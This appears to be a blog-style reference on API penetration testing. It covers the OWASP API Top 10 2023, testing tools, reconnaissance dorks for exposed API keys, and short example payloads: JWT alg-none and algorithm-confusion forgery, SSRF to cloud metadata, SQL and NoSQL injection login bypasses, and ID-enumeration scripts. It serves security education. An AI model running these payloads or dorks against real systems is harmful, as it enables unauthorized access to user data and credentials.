API Penetration Testing - Technical Reference
📋 Table of Contents
🎯 Introduction
Application Programming Interfaces (APIs) have become the backbone of modern applications, enabling seamless communication and data exchange between different systems. However, their increasing prevalence has also made them a prime target for attackers. This comprehensive technical reference provides security professionals with detailed information about API penetration testing, covering vulnerabilities, tools, techniques, and automation methods.
APIs now represent the largest attack vector for modern applications. According to recent research, API attack traffic has surged by over 117% year-over-year, while the average number of APIs per organization has grown by 82%. Understanding API security vulnerabilities and testing methodologies is crucial for protecting modern applications.
🛡️ OWASP API Security Top 10 - 2023
The OWASP API Security Top 10 represents the most critical security risks facing APIs today. Understanding these vulnerabilities is fundamental to effective API penetration testing.
API1:2023 - Broken Object Level Authorization (BOLA)
⚠️ Description: APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface of Object Level Access Control issues. Object level authorization checks should be considered in every function that accesses a data source using an ID from the user.
🎯 Example Attack:
# Original request
GET /api/v1/users/123/profile HTTP/1.1
Authorization: Bearer token_for_user_123
# Attack: Change user ID to access other user's profile
GET /api/v1/users/456/profile HTTP/1.1
Authorization: Bearer token_for_user_123
GET /api/v1/users/123/profile HTTP/1.1
Authorization: Bearer token_for_user_123
# Attack: Change user ID to access other user's profile
GET /api/v1/users/456/profile HTTP/1.1
Authorization: Bearer token_for_user_123
Testing Methodology:
- Identify all endpoints that use object identifiers
- Test with different user IDs (sequential, random, UUID)
- Test with different privilege levels
- Enumerate objects to find accessible resources
- Check for UUID predictability
✅ Remediation:
- Implement proper authorization checks for every object access
- Use random, unpredictable identifiers
- Validate user permissions before returning data
- Implement proper access control lists (ACLs)
API2:2023 - Broken Authentication
⚠️ Description: Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or exploit implementation flaws to assume other users' identities temporarily or permanently.
Common Vulnerabilities:
- Weak password policies
- Missing account lockout mechanisms
- JWT token vulnerabilities
- OAuth misconfigurations
- API key exposure
- Session management flaws
🎯 JWT Attack Examples:
# JWT Algorithm Confusion Attack
# Change algorithm from RS256 to HS256
# Original JWT header: {"alg":"RS256","typ":"JWT"}
# Modified: {"alg":"HS256","typ":"JWT"}
# JWT None Algorithm Attack
# Set algorithm to "none"
{"alg":"none","typ":"JWT"}
# Weak JWT Secret Brute Force
hashcat -m 16500 jwt.txt wordlist.txt
# Change algorithm from RS256 to HS256
# Original JWT header: {"alg":"RS256","typ":"JWT"}
# Modified: {"alg":"HS256","typ":"JWT"}
# JWT None Algorithm Attack
# Set algorithm to "none"
{"alg":"none","typ":"JWT"}
# Weak JWT Secret Brute Force
hashcat -m 16500 jwt.txt wordlist.txt
API3:2023 - Broken Object Property Level Authorization
⚠️ Description: This category combines API3:2019 Excessive Data Exposure and API6:2019 Mass Assignment, focusing on the root cause: the lack of or improper authorization validation at the object property level.
🎯 Mass Assignment Attack:
POST /api/v1/users/profile HTTP/1.1
Content-Type: application/json
{
"username": "attacker",
"email": "attacker@example.com",
"isAdmin": true,
"role": "administrator",
"accountBalance": 999999
}
Content-Type: application/json
{
"username": "attacker",
"email": "attacker@example.com",
"isAdmin": true,
"role": "administrator",
"accountBalance": 999999
}
API4:2023 - Unrestricted Resource Consumption
⚠️ Description: Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Successful attacks can lead to Denial of Service or an increase in operational costs.
API5:2023 - Broken Function Level Authorization
⚠️ Description: Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws.
API6:2023 - Unrestricted Access to Sensitive Business Flows
⚠️ Description: APIs vulnerable to this risk expose a business flow without compensating for how the functionality could harm the business if used excessively in an automated manner.
API7:2023 - Server-Side Request Forgery (SSRF)
⚠️ Description: SSRF flaws can occur when an API is fetching a remote resource without validating the user-supplied URI. This enables an attacker to coerce the application to send a crafted request to an unexpected destination.
🎯 SSRF Attack Example:
POST /api/v1/fetch HTTP/1.1
Content-Type: application/json
{
"url": "http://169.254.169.254/latest/meta-data/"
}
Content-Type: application/json
{
"url": "http://169.254.169.254/latest/meta-data/"
}
API8:2023 - Security Misconfiguration
⚠️ Description: APIs and the systems supporting them typically contain complex configurations. Software and DevOps engineers can miss these configurations or don't follow security best practices when it comes to configuration.
API9:2023 - Improper Inventory Management
⚠️ Description: APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions also are important.
API10:2023 - Unsafe Consumption of APIs
⚠️ Description: Developers tend to trust data received from third-party APIs more than user input, and so tend to adopt weaker security standards.
🛠️ API Penetration Testing Tools
Burp Suite - Web Application Security Testing Platform
Burp Suite is a comprehensive web application security testing platform that includes powerful features for API testing.
Key Features for API Testing:
- Proxy for intercepting and modifying API requests
- Scanner for automated vulnerability detection
- Repeater for manual testing
- Intruder for automated attacks
- Extensions for specialized API testing
Postman - API Development and Testing Platform
Postman is a popular API development and testing platform that includes security testing features.
Key Features for Security Testing:
- API request builder
- Collection runner for automated tests
- Environment variables for testing different configurations
- Pre-request scripts for dynamic testing
- Test scripts for validation
- Security testing features in Postman v10+
OWASP ZAP (Zed Attack Proxy)
OWASP ZAP is a free and open-source web application security scanner that can be used for API testing.
Key Features for API Testing:
- API scanning capabilities
- Fuzzing functionality
- Active and passive scanning
- Automation support
- API definition import (OpenAPI, SOAP)
Kiterunner - Contextual Content Discovery Tool
Repository: https://github.com/assetnote/kiterunner
Kiterunner is an advanced API discovery tool that goes beyond traditional content discovery by bruteforcing routes/endpoints in modern applications.
Key Features:
- Performs traditional content discovery at lightning fast speeds
- Bruteforces routes/endpoints in modern application frameworks (Flask, Rails, Express, Django)
- Uses dataset of Swagger specifications to send correct HTTP methods, headers, paths, parameters and values
- Supports depth scanning for nested API endpoints
- Wildcard detection and quarantine threshold to avoid false positives
# Scan with Assetnote wordlists
kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 \
--fail-status-codes 400,401,404,403,501,502,426,411
# Scan with custom wordlist
kr scan target.com -w routes.kite -x 20 -j 1
# Bruteforce with extensions
kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 \
-exml,asp,aspx,ashx -D
kr scan hosts.txt -A=apiroutes-210328:20000 -x 5 -j 100 \
--fail-status-codes 400,401,404,403,501,502,426,411
# Scan with custom wordlist
kr scan target.com -w routes.kite -x 20 -j 1
# Bruteforce with extensions
kr brute https://target.com/subapp/ -w dirsearch.txt -x 20 -j 1 \
-exml,asp,aspx,ashx -D
ffuf (Fuzz Faster U Fool)
Repository: https://github.com/ffuf/ffuf
Fast web fuzzer written in Go for API and web application security testing.
# API endpoint fuzzing
ffuf -w api-endpoints.txt -u https://api.target.com/FUZZ \
-H "Authorization: Bearer TOKEN"
# Parameter fuzzing
ffuf -w params.txt -u https://target.com/api?FUZZ=value
# POST data fuzzing
ffuf -w wordlist.txt -X POST -d "param=FUZZ" -u https://target.com/api
ffuf -w api-endpoints.txt -u https://api.target.com/FUZZ \
-H "Authorization: Bearer TOKEN"
# Parameter fuzzing
ffuf -w params.txt -u https://target.com/api?FUZZ=value
# POST data fuzzing
ffuf -w wordlist.txt -X POST -d "param=FUZZ" -u https://target.com/api
Arjun - HTTP Parameter Discovery Suite
Repository: https://github.com/s0md3v/Arjun
Python tool for discovering hidden HTTP parameters in web applications and APIs.
# Basic parameter discovery
arjun -u https://api.target.com/endpoint
# Multiple URLs from file
arjun -i urls.txt
# JSON output
arjun -u https://target.com/api -oJ output.json
arjun -u https://api.target.com/endpoint
# Multiple URLs from file
arjun -i urls.txt
# JSON output
arjun -u https://target.com/api -oJ output.json
GraphQL Tools
| Tool | Description | Repository |
|---|---|---|
| GraphQLmap | Scripting engine to interact with GraphQL endpoint for pentesting | GitHub |
| InQL | Burp Extension for GraphQL Security Testing | GitHub |
| BatchQL | GraphQL security auditing script with focus on batch queries | GitHub |
| clairvoyance | Obtain GraphQL API schema despite disabled introspection | GitHub |
📝 Wordlists and Fuzzing Resources
SecLists
Repository: https://github.com/danielmiessler/SecLists
SecLists is a collection of multiple types of lists used during security assessments, including wordlists for API testing.
Relevant Wordlists:
Discovery/Web-Content/api/- API-specific wordlistsDiscovery/Web-Content/common.txt- Common pathsFuzzing/- Fuzzing payloadsPasswords/- Password lists for authentication testing
Assetnote Wordlists
Website: https://wordlists.assetnote.io/
Assetnote provides comprehensive wordlists specifically designed for API and web application security testing.
Common API Endpoints
/api/v1/
/api/v2/
/api/v3/
/rest/
/graphql
/swagger.json
/openapi.json
/api-docs
/docs
/api/docs
/api/swagger
/api/openapi
/api/v2/
/api/v3/
/rest/
/graphql
/swagger.json
/openapi.json
/api-docs
/docs
/api/docs
/api/swagger
/api/openapi
🔍 External Reconnaissance Platforms
Shodan - The Search Engine for Internet-Connected Devices
Website: https://www.shodan.io/
Shodan is a search engine that crawls the internet and indexes information about connected devices, services, and APIs.
Common Shodan Filters for API Discovery:
| Filter | Description | Example |
|---|---|---|
http.component |
Search for specific web components | http.component:"swagger" |
http.title |
Search by page title | http.title:"API" |
port |
Filter by specific ports | port:80,443,8080 |
ssl |
Search SSL certificates | ssl:"api.example.com" |
org |
Filter by organization | org:"Example Corp" |
Shodan Dorks for API Discovery:
# Find API endpoints
"content-type: application/json"
"api" port:80,443,8080,8443
# Find Swagger/OpenAPI documentation
"swagger" "API"
"/api/v1" "swagger.json"
"/api-docs"
# Find GraphQL endpoints
"graphql" port:80,443
"Content-Type: application/graphql"
# Find exposed API keys
"api_key" "Authorization: Bearer"
"content-type: application/json"
"api" port:80,443,8080,8443
# Find Swagger/OpenAPI documentation
"swagger" "API"
"/api/v1" "swagger.json"
"/api-docs"
# Find GraphQL endpoints
"graphql" port:80,443
"Content-Type: application/graphql"
# Find exposed API keys
"api_key" "Authorization: Bearer"
Censys - Internet Intelligence Platform
Website: https://search.censys.io/
Censys provides comprehensive internet-wide scanning and asset discovery, particularly useful for finding exposed APIs and services.
# Find APIs by service
services.service_name: "HTTP" and services.http.response.body: "api"
# Find Swagger documentation
services.http.response.body: "swagger"
# Find GraphQL endpoints
services.http.response.body: "graphql"
services.service_name: "HTTP" and services.http.response.body: "api"
# Find Swagger documentation
services.http.response.body: "swagger"
# Find GraphQL endpoints
services.http.response.body: "graphql"
ZoomEye - Cyberspace Search Engine
Website: https://www.zoomeye.ai/
ZoomEye is a cyberspace search engine that provides device and service discovery capabilities.
Google Dorking for APIs
# Find API documentation
site:example.com inurl:api/docs
site:example.com "api documentation"
site:example.com swagger.json
# Find exposed API keys
site:example.com "api_key"
site:example.com "apikey"
# Find GraphQL
site:example.com inurl:graphql
site:example.com "graphql playground"
site:example.com inurl:api/docs
site:example.com "api documentation"
site:example.com swagger.json
# Find exposed API keys
site:example.com "api_key"
site:example.com "apikey"
# Find GraphQL
site:example.com inurl:graphql
site:example.com "graphql playground"
⚔️ Common Attack Techniques
1. Broken Object Level Authorization (BOLA/IDOR)
🎯 Attack Example:
# Original request
GET /api/v1/users/123/profile HTTP/1.1
Authorization: Bearer token_for_user_123
# Attack: Enumerate all users
GET /api/v1/users/1/profile
GET /api/v1/users/2/profile
GET /api/v1/users/3/profile
GET /api/v1/users/123/profile HTTP/1.1
Authorization: Bearer token_for_user_123
# Attack: Enumerate all users
GET /api/v1/users/1/profile
GET /api/v1/users/2/profile
GET /api/v1/users/3/profile
2. SQL Injection
🎯 Attack Examples:
# SQL Injection in API parameter
GET /api/v1/users?id=1' OR '1'='1 HTTP/1.1
# Union-based SQL Injection
GET /api/v1/products?id=1 UNION SELECT username,password FROM users-- HTTP/1.1
# Time-based Blind SQL Injection
GET /api/v1/search?q=test' AND SLEEP(5)-- HTTP/1.1
GET /api/v1/users?id=1' OR '1'='1 HTTP/1.1
# Union-based SQL Injection
GET /api/v1/products?id=1 UNION SELECT username,password FROM users-- HTTP/1.1
# Time-based Blind SQL Injection
GET /api/v1/search?q=test' AND SLEEP(5)-- HTTP/1.1
3. NoSQL Injection
🎯 Attack Examples:
# MongoDB Injection
POST /api/v1/login HTTP/1.1
Content-Type: application/json
{
"username": {"$ne": null},
"password": {"$ne": null}
}
# MongoDB Operator Injection
GET /api/v1/users?age[$gt]=0 HTTP/1.1
POST /api/v1/login HTTP/1.1
Content-Type: application/json
{
"username": {"$ne": null},
"password": {"$ne": null}
}
# MongoDB Operator Injection
GET /api/v1/users?age[$gt]=0 HTTP/1.1
4. Server-Side Request Forgery (SSRF)
🎯 Attack Examples:
# SSRF to internal metadata service
POST /api/v1/fetch HTTP/1.1
Content-Type: application/json
{
"url": "http://169.254.169.254/latest/meta-data/"
}
# SSRF to internal services
{
"url": "http://localhost:6379/" # Redis
}
POST /api/v1/fetch HTTP/1.1
Content-Type: application/json
{
"url": "http://169.254.169.254/latest/meta-data/"
}
# SSRF to internal services
{
"url": "http://localhost:6379/" # Redis
}
5. GraphQL Specific Attacks
🎯 Introspection Query:
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
types {
...FullType
}
}
}
__schema {
queryType { name }
mutationType { name }
types {
...FullType
}
}
}
🎯 Batch Query Attack:
query {
user1: user(id: 1) { email }
user2: user(id: 2) { email }
user3: user(id: 3) { email }
# ... repeat 1000 times
}
user1: user(id: 1) { email }
user2: user(id: 2) { email }
user3: user(id: 3) { email }
# ... repeat 1000 times
}
🤖 Automation Scripts and Techniques
Python API Testing Script
import requests
import json
def test_api_endpoint(base_url, endpoint, token):
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
# Test for BOLA
for user_id in range(1, 100):
url = f"{base_url}{endpoint}/{user_id}"
response = requests.get(url, headers=headers)
if response.status_code == 200:
print(f"[+] Accessible: {url}")
elif response.status_code == 403:
print(f"[-] Forbidden: {url}")
import json
def test_api_endpoint(base_url, endpoint, token):
headers = {
'Authorization': f'Bearer {token}',
'Content-Type': 'application/json'
}
# Test for BOLA
for user_id in range(1, 100):
url = f"{base_url}{endpoint}/{user_id}"
response = requests.get(url, headers=headers)
if response.status_code == 200:
print(f"[+] Accessible: {url}")
elif response.status_code == 403:
print(f"[-] Forbidden: {url}")
Automated API Security Testing Script
#!/bin/bash
API_URL="https://api.example.com"
OUTPUT_DIR="./api_test_results"
# 1. Enumerate endpoints with Kiterunner
kr scan $API_URL -w routes.kite -x 20 -j 100 \
--fail-status-codes 400,401,404,403 \
-o $OUTPUT_DIR/kiterunner_results.txt
# 2. Fuzz with ffuf
ffuf -w /usr/share/wordlists/api-endpoints.txt \
-u $API_URL/FUZZ \
-mc 200,201,301,302,401,403 \
-o $OUTPUT_DIR/ffuf_results.json
# 3. Parameter discovery with Arjun
arjun -u $API_URL/api/endpoint \
-oJ $OUTPUT_DIR/arjun_results.json
API_URL="https://api.example.com"
OUTPUT_DIR="./api_test_results"
# 1. Enumerate endpoints with Kiterunner
kr scan $API_URL -w routes.kite -x 20 -j 100 \
--fail-status-codes 400,401,404,403 \
-o $OUTPUT_DIR/kiterunner_results.txt
# 2. Fuzz with ffuf
ffuf -w /usr/share/wordlists/api-endpoints.txt \
-u $API_URL/FUZZ \
-mc 200,201,301,302,401,403 \
-o $OUTPUT_DIR/ffuf_results.json
# 3. Parameter discovery with Arjun
arjun -u $API_URL/api/endpoint \
-oJ $OUTPUT_DIR/arjun_results.json
🎓 Practice Environments
Deliberately vulnerable APIs for learning and practicing API penetration testing:
| Name | Author | Description |
|---|---|---|
| crAPI | OWASP | Completely ridiculous API for learning |
| Damn Vulnerable GraphQL Application | dolevf | Intentionally vulnerable GraphQL implementation |
| VAmPI | erev0s | Vulnerable REST API with OWASP top 10 vulnerabilities |
| vAPI | roottusk | Self-hostable API mimicking OWASP API Top 10 scenarios |
| Pixi | DevSlop | MEAN Stack web app with insecure APIs |
📚 References
- OWASP Foundation. (2023). OWASP API Security Top 10 2023. https://owasp.org/API-Security/editions/2023/en/0x11-t10/
- OWASP Foundation. (2024). Web Security Testing Guide. https://owasp.org/www-project-web-security-testing-guide/
- Assetnote. (2021). Kiterunner - Contextual Content Discovery Tool. https://github.com/assetnote/kiterunner
- arainho. Awesome API Security. https://github.com/arainho/awesome-api-security
- Shodan. Shodan Search Engine. https://www.shodan.io/
- Censys. Censys Internet Intelligence Platform. https://search.censys.io/
Comments
Post a Comment